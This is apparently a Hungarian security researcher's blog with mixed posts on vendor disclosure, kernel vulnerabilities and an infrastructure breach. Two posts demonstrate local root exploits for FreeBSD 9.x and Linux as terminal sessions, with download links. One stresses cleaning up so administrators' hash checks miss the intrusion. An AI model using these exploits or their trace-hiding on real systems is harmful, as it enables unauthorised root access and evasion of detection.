Hunger blogja

"Linus szerint az amerikai kormány megkörnyékezte, hogy kiskaput helyezzen a Linuxba"

Erősen szkeptikus vagyok azzal kapcsolatban, hogy ez igaz lenne. Linus vagy csak viccelt, vagy a szenzációhajhászás miatt mondott nemet és bólogatott igent arra a kérdésre, hogy volt-e ilyen jellegű megkeresése.

Ha egy titkosszolgálat kiskaput szeretne a Linuxba (minek akarna egyébként, van benne kihasználható hiba elég... ;), akkor sem a szoftver atyját környékezik meg, aki nyilván saját "gyermekét" nem fogja "molesztálni", hanem sokkal inkább egy random fejlesztőt próbálnak megvenni, aki már jó ideje küld nagy volumenű commitokat a kernelbe (mondjuk az IP stackbe ;) és megbízhatónak tekinti a többi fejlesztő, kevésbé nézik át a munkáit, ugyanakkor a róla kialakított profil alapján mégis könnyen korrumpálhatónak tűnik.

Samsung vs. Mobile Pwn2Own - EPIC FAIL (lamest vendor response of the year?)

Mostanság már ritkábban látni akkora bénázást, mint amit a Samsung követett el egy távoli kódvégrehajtásra alkalmat adó biztonsági hiba kezelése kapcsán.

A történet még a tavalyi Pwn2Own versenyre nyúlik vissza, egész pontosan az EuSecWest 2012 mobil Pwn2Own versenyére. Az MWR Labs egy Android 4.0.4-et futtató Samsung Galaxy III-at tört fel NFC-n keresztül egy preparált DOCX file segítségével. A Samsung következő nap információt kért a ZDI-től a sebezhetőséggel kapcsolatban. A ZDI - nyilván a hiba komolyságára való tekintettel - egy kapcsolattartót és annak PGP publikus kulcsát kérte, hogy biztonságosan tudják lekommunikálni a sebezhetőséggel kapcsolatos részleteket. A Samsung erre egy központi incidenskezelő kapcsolatát és annak PGP kulcsát küldte. A ZDI jelezte ezt, hisz nyilván felesleges lett volna a szokásos formaságokon végigmenni és sok kört futni először is azzal, hogy miről van szó és valóban biztonsági hiba egyáltalán, stb. Logikus. A Samsung meg is küldte ezután a biztonsági csapatuk (Samsung Security Team) elérhetőségét és PGP kulcsát, így látszólag úgy tűnt, hogy minden a legnagyobb rendben és most már kördülékenyen fog lezajlani a probléma kezelése.

Tisztázatlan körülmények között elhunyt Barnaby Jack

Néhány nappal a BlackHat előadása előtt váratlanul életét vesztette Barnaby Jack, aki a szívritmus szabályzókban lévő biztonsági hibákra szerette volna felhívni a figyelmet. A korábban Dark Spyrit néven is ismert hacker már a '90-es évek végétől aktív volt és olyan publikációk kötődnek a nevéhez, mint a Phrackban közölt távoli kódvégrehajtás az SLMail SMTP szerverben és számos más szerver szoftverben az Interscan VirusWall-tól a Microsoft IIS-ig. Dolgozott az eEye Digital Securitynek, a McAfeenek, a Juniper Networksnek, a FoundStonenak. Jelenleg az IOActive beágyazott eszközök biztonságáért felelős részleg igazgatója volt.

FreeBSD 9.{0,1} mmap/ptrace exploit V2: Clean-up version (no backdoor left)

Az eredeti exploit módosítva hagyta legtöbbször a támadáshoz használt suid root binárist, így mindig utána egyből rootot adott és az eredeti feladatát nem látta el a továbbiakban. Ez feltűnhet az üzemeltetőknek és kibukhat hash ellenőrzéskor, ezért ez az új változat már helyreállítja az eredeti állapotot, hogy ne maradjon nyom... :)


$ uname -a
FreeBSD fbsd91x64 9.1-STABLE #8: Wed Jun 18 10:32:07 CEST 2013
     root@fbsd91x64:/usr/src/sys/amd64/compile/STABLE  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ ftp -V http://hunger.hu/fbsd9lul2.c
$ gcc fbsd9lul2.c -o fbsd9lul2
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ ./fbsd9lul2
FreeBSD 9.{0,1} mmap/ptrace exploit V2
Clean-up version (no backdoor left)
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# exit
$ ls -la /sbin/ping
-r-sr-xr-x   1 root  wheel      28008 Dec  4  2012 ping
$ sha1 /sbin/ping
SHA1 (/sbin/ping) = c52754040fe00c3c4512d679ee46f9ff60eb6be6
$ /sbin/ping
usage: ping [-AaDdfnoQqRrv] [-c count] [-G sweepmaxsize] [-g sweepminsize]

...

FreeBSD 9.{0,1} mmap/ptrace exploit


$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec  4 09:23:10 UTC 2012
     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger (fbsd9lul@hunger.hu)
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#

http://hunger.hu/fbsd9lul.c

Google összevonja az ingyenes tárhelyek méretét 10+5 GB-ról egységes 15 GB-ra

Már többször betelt a Gmail postafiókom és emiatt leveleket kellett törölnöm. Nemrég ismét elértem a 95%-ot és ilyenkor megjelenít egy külön figyelmeztetést az oldal tetején, hogy hamarosan betelik a tárhelyem, ezért fizessek elő nagyobbra, vagy töröljek a leveleim közül.

Először arra gondoltam, hogy biztos belátták, nem fogok előfizetni nagyobb tárhelyre, azt pedig valamiért (hm-hm ;) nem akarják, hogy ismét töröljek a levelezésemből, ezért inkább megnövelték a postafiókom méretét ingyen 10 GB-ról 15 GB-ra, de aztán rákeresve a jelenségre olybá tűnik, hogy ezt szép fokozatosan mindenkinél meg fogják tenni:

Videó a Linux kernel sebezhetőség kihasználásáról Ubuntu és Red Hat Enterprise Linux alatt

A csendben javított kritikus linux sebezhetőségre, amelyre három éve létezik exploit, most lecsapott Brad Spengler, a GRSecurity Linux kernel védelmi patch fejlesztője és portolta az eredeti exploit kódját a saját, Enlightenment nevű Linux kernel exploit keretrendszeréhez.

Az új verzió root jogokat szerez az Ubuntu 12.04 rendszereken és minden LSM alapú védelmet kikapcsol, AppArmortól az SELinuxig. A videó megtekinthető róla itt:

Újabb csendben javított Linux kernel sebezhetőség...

...amelyre már kinn is van egy exploit attól, aki már 3 éve tudott róla.


hunger@hgc ~ $ uname -a
Linux hgc 3.2.43 #1 SMP Sat Apr 27 04:00:32 CEST 2013 x86_64 GNU/Linux
hunger@hgc ~ $ id
uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
hunger@hgc ~ $ ./a.out
2.6.37-3.x x86_64
2010
hgc ~ # id
uid=0(root) gid=0(root) groups=0(root),1000(hunger)
hgc ~ #

PaX UDEREF/KERNEXEC véd ellene.

https://news.ycombinator.com/item?id=5703758

Üdv a UPC netadminjainak


Tracing route to kangaroo.ahrt.hu [212.92.0.1]
over a maximum of 30 hops:

  1    <1 ms    <1 ms    <1 ms  Router [192.168.1.1]
  2    26 ms    28 ms    15 ms  catv-89-135-212-68.catv.broadband.hu [89.135.212.68]
  3     7 ms     8 ms     9 ms  catv-89-135-218-78.catv.broadband.hu [89.135.218.78]
  4   121 ms   123 ms   118 ms  84.116.240.178
  5   156 ms   118 ms   117 ms  at-vie15a-rd1-xe-1-0-0.aorta.net [84.116.134.1]
  6   116 ms   128 ms   112 ms  uk-lon01b-rd1-xe-1-0-1.aorta.net [84.116.132.37]
  7   118 ms   119 ms   119 ms  84-116-130-141.aorta.net [84.116.130.141]
  8   117 ms   118 ms   117 ms  84.116.137.194
  9   121 ms   120 ms   120 ms  xe-4-1-0.edge1.NewYork1.Level3.net [4.78.132.93]
 10   120 ms   120 ms   117 ms  COGENT-COMM.edge1.NewYork1.Level3.net [4.68.111.46]
 11   120 ms   122 ms   120 ms  te0-3-0-3.mpd21.jfk02.atlas.cogentco.com [154.54.31.1]
 12   124 ms   125 ms   123 ms  te0-2-0-1.ccr21.bos01.atlas.cogentco.com [154.54.44.10]
 13   186 ms   185 ms   190 ms  te0-5-0-1.ccr21.lpl01.atlas.cogentco.com [154.54.44.194]
 14   200 ms   198 ms   198 ms  te0-1-0-6.ccr22.ams03.atlas.cogentco.com [154.54.37.117]
 15   203 ms   207 ms   202 ms  te0-5-0-2.mpd21.fra03.atlas.cogentco.com [130.117.48.138]
 16   209 ms   212 ms   215 ms  te0-3-0-4.ccr22.muc01.atlas.cogentco.com [130.117.0.10]
 17   218 ms   214 ms   214 ms  te0-1-0-0.ccr21.bts01.atlas.cogentco.com [130.117.51.181]
 18   238 ms   226 ms   230 ms  te0-1-0-0.ccr21.bud01.atlas.cogentco.com [130.117.3.54]
 19   256 ms   431 ms   430 ms  te1-2.ccr01.bud03.atlas.cogentco.com [130.117.48.226]
 20   120 ms   118 ms   124 ms  149.11.10.18
 21   126 ms   129 ms   130 ms  sw-0-53.BPV.ip2.HU.AHRT.HU [212.92.0.126]

NetLock OCSP/CRL DoS

Ez a levél érkezett a postaládámba:

---

from: NetLock Kft.
date: Thu, Jan 10, 2013 at 6:26 PM
subject: NetLock Kft. - OCSP Stapling beállítása a web szerverén

Tisztelt Ügyfelünk,
A napokban szervereink irracionális terhelést kaptak a visszavonási információk letöltése kapcsán (OCSP, CRL), amely letöltések, így egyes esetekben lelassulhattak, ami az Ön által SSL tanúsítvánnyal védett oldallal történő kapcsolatfelvétel lelassulását eredményezheti.
Az okokat jelenleg is vizsgáljuk, azonban általában javasolt, hogy amennyiben szervere támogatja az OCSP Stapling funkciót (Apache 2.3 és újabb, IIS 7-Windows 2008 szerveren és újabb, NginX 1.3.7 és újabb verziók), akkor a ERŐSEN AJÁNLOTT, HOGY BEÁLLÍTSA AZT, hiszen ügyfelei a weboldalán a kapcsolat sebességének növekedését fogják tapasztalni.
A beállítások elvégzéséhez készült útmutatóink segítségével ez már könnyen elvégezhető, kérjük, tekintse meg őket.
Az útmutató elérhető a következő oldalról:
http://www.netlock.hu/html/termektamogatas.html#szerverek
Az útmutató közvetlen linkje:
http://www.netlock.hu/docs/segedletek/szerver_ocsp_stapling_sha256.pdf
A beállításhoz szükséges tanúsítványok egyesített csomagjának közvetlen linkje:
http://www.netlock.hu/docs/letoltes/ssl_kiadok_csomag.zip

Biztonsági incidens a FreeBSD Infrastruktúrában

November 11-én vasárnap behatolást érzékeltek két gépen a FreeBSD.org klaszteren belül. Nem találtak semilyen olyan módosításra utaló nyomot, amely veszélyeztetheti a végfelhasználókat, ennek ellenére javasolják, hogy olvassa el minden felhasználó a történtekkel kapcsolatos jelentést itt:

http://www.freebsd.org/news/2012-compromise.html